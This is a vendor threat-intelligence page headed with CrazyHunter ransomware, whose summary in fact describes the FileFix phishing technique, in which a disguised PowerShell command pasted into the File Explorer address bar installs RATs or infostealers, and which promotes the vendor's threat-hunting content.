Emerging Threats//
CrazyHunter Ransomware
CrazyHunter is a ransomware campaign targeting healthcare that weakens endpoint defenses and escalates privileges before encrypting systems at scale.
Threat Summary
The FileFix social engineering technique is a sophisticated phishing method that builds upon the previously known (and abused) ClickFix tactic. However unlike ClickFix, which deceives users into executing malicious commands via the Windows Run dialog, FileFix takes a more subtle approach by exploiting the Windows File Explorer's address bar. This technique involves opening a legitimate File Explorer window from a malicious webpage and silently copying a disguised PowerShell command to the user's clipboard. When the user pastes this content into the address bar, the command executes unbeknownst to the user, leading to the download and execution of malware. The payloads delivered through FileFix attacks have included Remote Access Trojans (RATs) and information stealers, which can lead to unauthorized access to sensitive data and systems. Organizations across various sectors, including finance, healthcare, and education, are at risk, as this method bypasses traditional security warnings and relies on user trust in familiar interfaces.
Furthermore, in mid-July of 2025, a DFIR report was released covering the abuse of the FileFix technique to deliver a new (and evolved) Interlock RAT Variant being utilized in an active campaign. It is worthy to note that although the paths to execution differ between FileFix and ClickFix techniques, the commands used are likely to be similar or rely on comparable artifacts and methods. The packages included in this collection are based on available reporting related to FileFix at this point in time. Furthermore, attackers may adopt commands similar to those used in ClickFix, as they have with other execution techniques.
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!